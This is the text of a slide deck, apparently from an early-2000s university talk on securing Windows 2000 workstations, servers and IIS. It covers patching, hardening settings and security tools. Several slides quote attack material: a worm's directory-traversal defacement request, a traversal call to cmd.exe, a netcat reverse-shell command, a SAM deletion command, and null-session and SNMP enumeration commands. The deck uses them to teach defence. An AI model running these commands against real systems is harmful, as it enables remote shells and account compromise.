WinSecurity

8/14/2019 WinSecurity

http://slidepdf.com/reader/full/winsecurity 1/70

1

Windows 2000 SecurityWindows 2000 Security

Matthew Cook

Loughborough Universityhttp://www.escarpment.net/



2

Introduction

Loughborough University

http://www.lboro.ac.uk/computing/

Janet Web Cache Service

http://wwwcache.ja.net



3

Security @ Lboro

3 Evaluation of Security Service/Policy

3 Demand for Windows and Linux security

advice3 Need for other OS security advice

3 Installation of Internet Facing Windows

2000 systems.



4

Windows 2000 Security

3 Overview of General Security Threats

3 Workstation Security

3 Server Security

3 IIS Security

3 Security Tools

3 Questions and Answers



5

Physical Security

"The only system which is trulysecure is one which is switched off

and unplugged, locked in a titaniumlined safe, buried in a concretebunker, and is surrounded by …

very highly paid armed guards. Eventhen, I wouldn't stake my life on it."

Gene Spafford



6

Security Threats

3 Denial of Service

3 Theft of information

3 Modification

3 Fabrication (Spoofing or Masquerading)



7

Security Holes

3 Physical Security Holes

3 Software Security Holes

3 Incompatible Usage Security Holes

3 Social Engineering

3 Complacency



8

Workstation Security

Security for General Workstations



9

Workstation Security

3 Physical Security

3 BIOS

3 Service Packs and Hot fixes3 NTFS ACLS

3 Policies and Profiles

3

Security Templates3 Auditing

3 Threats



10

Service Packs and Hot fixes

3 Ensure you have the latest ‘evaluated’

service packs and hot fixes.

3 Check the model periodically3 Hfnetchk Tool



11

NTFS ACLS

3 Ensure you use NTFS

3 Partition your drives per application

3 Use xcacls from the Resource Kit

3 Script NTFS security

3 Set using Security Templates

3 Example



12

Policies and Profiles

3 NT Policy files are different to GPO (Group

Policy Objects) in Windows 2000

3 LGPO located in:%windir%\system32\grouppolicy

3 ADGPO located in:

%windir%\system32\sysvol\camford\policies3 Demonstration



13

Security Templates

3 Use ‘Security Settings’ applet to apply

3 Located in %windir%\security\templates

3 Quick and Easy to apply

3 Templates are accumulative

3 Demonstration



14

Security Templates…

3 Setup security – Default settings

3 Compatws – Compatible

3 Basicdc/sv/wk – Basic Security

3 Securedc/wk – More Secure

3 Hisecdc/ws – Further Security

3 Ocfiless/w – Optional Components



15

Auditing & Event Logs

3 Use the ‘Security Settings’ applet to ensure

the Audit Policy has been configured

3 Check the Event Viewer regularly3 Or Use NTLast (Foundstone)

3 URL: http://www.foundstone.com/

3 Or ELM (TNT Software)

3 URL: http://www.tntsoftware.com/

http://www.foundstone.com/





16

Threats

3 PipeUpAdmin and PipeUpSAM

3 Netddemsg

3 EFS

3 DOS Boot disc

3 Linux Boot disc

3 BIOS Passwords



17

PipeUpAdmin & PipeUpSAM

3 Uses vulnerability in Named Pipes in the

Service Control Manger (SCM)

3 Adds user to Administrator Group3 Patch Bulletin: MS00-053

3 URL: http://www.dogmile.com/files/



18

Netddemsg

3 Uses vulnerability in NetDDE

3 Provides cmd in SYSTEM context

3 Patch Bulletin: MS01-007

3 NOT included in Windows 2000 SP2



19

EFS

3 Changing the password of the recovery

agent. (Administrator)

3 Changing the password of the user 3 EFS temporary files



20

DOS Boot Disc

3 DOS NTFS drivers bypass NTFS ACLS3 Allows removal of the SAM

del %windir%\system32\config\sam3 Allows extraction of the SAM3 URL: http://www.sysinternals.com/

3

URL:http://www.esiea.fr/public_html/Christophe.GRE NIER/

http://www.sysinternals.com/






21

Linux Boot Disc

3 Edit SAM password hashes

3 Disable SYSKEY

3 Limited SCSI support

3 URL: http://home.eunet.no/~pnordahl/



22

BIOS Passwords

3 Even a BIOS password is not secure

3 Check for vulnerabilities

3 Check for Default Passwords

3 Upgrade BIOS

3 URL:http://www.esiea.fr/public_html/Christophe.GRE

NIER/



23

Server Security

Security for Internet Facing Servers



24

Server Security

3 Advice for Workstation Security

3 NetBIOS/SMB Services

3 Hfnetchk and Qchain

3 SNMP Vulnerabilities

3 Active Directory Vulnerabilities

3 IPSec



25

NetBIOS/SMB Services

3 NetBIOS Name Service [Port UDP 137]

3 NetBIOS Session Service [Port TCP 139]

3 SMB over TCP [Port 445]

3 Port 445 Windows 2000 only

3 Block TCP/UDP 135-139 and 445 at the

firewall



26

NetBIOS/SMB Services…

Null Authentication:

Net use \\camford\IPC$ “” /u:“”

3 Famous tools like ‘Red Button’

Net view \\camford

3 Investigate srvcheck and srvinfo in the

Resouce Kit

http://camford/IPC$

http://camford/IPC$

http://camford/IPC$

http://camford/IPC$



27


3 Dumpsec from Somarsoft

3 URL: http://www.somarsoft.com

3 Enum from Razor

3 URL: http://razor.bindview.com/

3 A Google search reveals many, many more

http://razor.bindview.com/



http://www.somarsoft.com/





28


To disable NetBIOS

2. Select ‘Disable NetBIOS’ in the WINS

tab of advanced TCP/IP properties.3. Deselect ‘File and Print sharing’ in the

advanced settings of the ‘Network and

Dial-up connections’ window



29


Disable Null Authentication

3 Key similar to Windows NT 4.0

3 HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous

3 REG_DWORD set to 0, 1 or 2!

3 HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\RestrictAnonymous

3 REG_DWORD set to 0 or 1



30

Hfnetchk

3 Use Hfnetchk to check hot fixes

3 Checks machines against Microsoft XML

3 Automate the process using a batch filesand a mail client (Postie)

3 URL: http://www.infradig.com/infradig/postie/

3 Use QChain to chain hot fixes together

without rebooting in-between.

http://www.infradig.com/infradig/postie/









31

Hfnetchk…

Patch details for:

3 Windows NT 4.0 and Windows 2000

3 IIS 4 and IIS 5

3 SQL Server 7.0

3 SQL Server 2000

3 Internet Explorer 5.01 (and later)



32

Hfnetchk…

3 Default scan of local host (Pre downloaded)hfnetchk –x mssecure.xml

3 Default scan of lboro domainhfnetchk –d lboro

3 Verbose scan of local hosthfnetchk –v –x mssecure.xml

3 Verbose scan including installed hot fixeshfnetchk –v –a b –x mssecure.xml



33

Hfnetchk…

3 Test problemshfnetchk –z –v –x mssecure.xml

3 XML File Downloadhttp://download.microsoft.com/download/xml

/security/1.0/nt5/en-us/mssecure.cab

3 Using an internal copy of the XMLhfnetchk –x http://camford.ac.uk/mssecure.xml

hfnetchk –x s:\camford\mssecure.xml

http://download.microsoft.com/download/xml/security/1.0/nt5/en-us/mssecure.cab











34

QChain

Supported by:

3 Windows NT 4.0

3 Windows 2000

3 Windows XP (25th October 2001)



35

QChain…

3 Run the hot fix with –z (No reboot) and –m(Quiet mode)

3

Run qchain and then reboot3 Create a log using qchain [logname]3 Create batch files on a central server 3

URL:http://www.microsoft.com/Downloads\Release.as p?ReleaseID=29821



36

SNMP Vulnerabilities

3 Simple Network Management Protocol3 Snmpwalk camford public .1.3.6.1.4.1.77.1.2.25

3 SNMP Utilities in Resource Kit3 Turn off SNMP services

3 Set community names

3 Set accepted hosts



37

SNMP Vulnerabilities…



39

IPSec

3 Currently investigating

3 Linux Connectivity using FreeS/WAN

3 Mainly for wireless use

3 WEP encryption cracked

3 URL: http://www.freeswan.org/

3 URL: http://airsnort.sourceforge.net/



40

IIS Security

Internet Information Server



41

IIS Security

3 History

3 Recent Worms

3 IIS Lock Down Tool

3 URL Scan

3 The Future



42

IIS History

3 IIS 2.0 Installed by NT 4.0

3 IIS 3.0 followed by more common IIS 4.0

3 Quickly gained reputation for (in)security

3 IIS 5.0 Installed by Windows 2000

3 Microsoft releases Hfnetchk

3 Closely followed by IIS Lockdown and

URLScan



43

Recent Worms

3 Sadmind/IIS

Directory Traversal (Unicode Exploit)

3 CodeRedida/idq buffer overflow

3 CodeGreen

ida/idq buffer overflow3 Nimda

Directory Traversal (Unicode Exploit)



44

Sadmind/IIS

3 2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80GET /scripts/root.exe/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table

+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+col

or%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:[email protected]^</html^>>../wwwroot/default.htm 200 -



45

System Attacks

3 Monday Morning Phone Call

3 Perl Script ‘unicodeloader’

3 http://camford/scripts/upload.asp3 http://camford/scripts/cmdasp.asp

3 Sadmind/IIS worm and unicodeloader kit

3 GET /scripts/../../winnt/system32/cmd.exe

/c+dir 200 –

3 URL: http://www.sensepost.com/

http://camford/scripts/upload.asp

http://camford/scripts/cmdasp.asp











46

System Attacks…

3 Obtaining a remote shell

3 Attacking PC:

nc –l –p 12343 Camford:

nc.exe –v –e cmd.exe <attackingpc> 1234

3 URL: http://www.atstake.com/research/tools/



47

System Attacks…

3 Shell is in the context of IUSR_camford3 ISAPI.dll – RevertToSelf (Horovitz)

3 Upload using upload.asp3 http://camford/scripts/idq.dll

3 Version 2 coded by Foundstone

3 http://camford/scripts/idq.dll?3 Patch Bulletin: MS01-263 NOT included in Windows 2000 SP2

http://camford/scripts/idq.dll
















48

IIS Lock Down Tool

3 Automatic ‘Lock Down’3 Locks down IIS 4.0 and IIS 5.0

3 Express ‘lock down’ for simple web sites3 Custom ‘lock down’ for more complex

servers

3

Undo facility to reverse last ‘lock down’3 URL:

http://www.microsoft.com/Downloads\Release.as p?ReleaseID=32362



49

IIS Lock Down Tool…

Disable:

3 Active Server Pages

3

Index Server Interface3 Server Side Includes

3 Internet Data

Connector

3 Internet Printing

3 HTR Scripting

Remove:

3 Sample Web Files

3 Script VirtualDirectory

3 MSADC Directory

3 WebDAV

Set Permissions on:3 Exe files3 Content Directories



50

URL Scan

3 ISAPI filter scans incoming HTTP requests

3 Filtered based on rule set3

New rules easily added3 Default urlscan.ini suitable for static pages3 Restart service when changes made3

404 and logged request for matched rules3 URL:

http://www.microsoft.com/Downloads\Release.as p?ReleaseID=32571



51

URL Scan…

Filter on:

3 The request method (verb)

3 File Extension3 URL Encoding

3 Non ASCII characters

3 Malicious character sequence

3 Headers in HTTP GET



52

The Future

3 Gartner report recommends ditching IIS

3 Rewrite of IIS on the cards for version 6

3 Lock Down Tool (Interim Measures)3 Httpd functionality in the kernel (TechEd)

3 IIS Lockdown included in SP3

3 Further implications for .NET



53

Security Tools

A look at the freeware and

‘pay for’ tools available.



54

Security Tools

3 Snort3 CIS and Typhon

3 Pwdump3 Fport

3 L0pht Crack

3 Nmap3 Nessus3 Pandora



55

Snort

3 IDS – Intrusion Detection System

3 Libpcap packet sniffer and logger

3 Originally developed for the Unix platforms3 Open Source

3 Port to Win32 available (Release 1.8.1)

3 Installation on Win32 in under 30 minutes

3 Run on your IIS server or standalone



56

Snort…

Snort can detect:3 Stealth Port Scans

3 CGI Attacks3 Front Page Extensions Attacks

3 ICMP Activity

3 SMTP Activity3 SQL Activity3 SMB Probes



57

Snort…

3 Default logging to snort\logs\alert.ids3 Log to mySQL and SQL Server

3 Notification as logs, ‘winpopup’, email etc3 SnortSnaf or ACID (PHP Based)

3 GUI – IDS Center

3 URL: http://snort.sourcefire.com/3 URL: http://www.cert.org/kb/acid/

3 URL: http://www.silicondefense.com/



58

Snort…



59

CIS and Typhon

3 Typhon, formally Cerberus Internet Scanner

3 Written by David Litchfield

3 URL: http://www.nextgenss.com/

3 Demonstration



60

CIS and Typhon

3 Web Checks

3 FTP Checks

3

SMTP Checks3 POP3 Checks

3 NT Checks

3

NetBIOS Checks3 MS SQL Checks

3 SNMP Checks

3 RPC Checks

3

Portscan (TCP/UDP)3 Finger Checks

3 DNS Checks

3 Commercial Version



61

Pwdump

3 Version 3 (e = encrypted)

3 Developed by Phil Staubs and Erik

Hjelmstad3 Based on pwdump and pwdump2

3 URL: http://www.ebiz-

tech.com/html/pwdump.html



62

Pwdump…

3 Needs Administrative Privilidges

3 Extracts hashs even if syskey is installed

3 Extract from remote machines3 Identifies accounts with no password

3 Self contained utility



63

Fport

3 Reports on all open TCP and UDP ports

3 Maps Port to Application

3 Requires psapi.dll (Windows NT 4.0)3 URL: http://www.foundstone.com/

3 Demonstration



64

L0pht Crack

3 Password Auditing and Recovery

3 Crack Passwords from many sources

3 Registration $2493 URL: http://www.atstake.com/research/lc3/

3 Demonstration



65

L0pht Crack…

Crack Passwords from:

3 Local Machine

3 Remote Machine3 SAM File

3 SMB Sniffer

3 PWDump file



66

Nmap

3 Port Scanning Tool

3 Stealth scanning, OS Fingerprinting

3 Open Source3 Runs under Unix based OS

3 Port development for Win32

3 URL: http://www.insure.org/nmap/



67

Nmap…



68

Nessus

3 Remote security scanner similar to Typhon

3 Very comprehensive

3 Frequently updated modules3 Testing of DoS attacks

3 Open Source

3 Win32 and Java Client

3 URL: http://nessus.org/



69

Pandora

3 Not strictly Windows 2000 Security

3 Runs on either Unix or Win32

3 Excellent tool to evaluate Netware security3 Open Source

3 Lots of additional information

3 URL: http://www.nmrc.org/pandora/



Questions and Answers

WinSecurity

Documents

Transcript of WinSecurity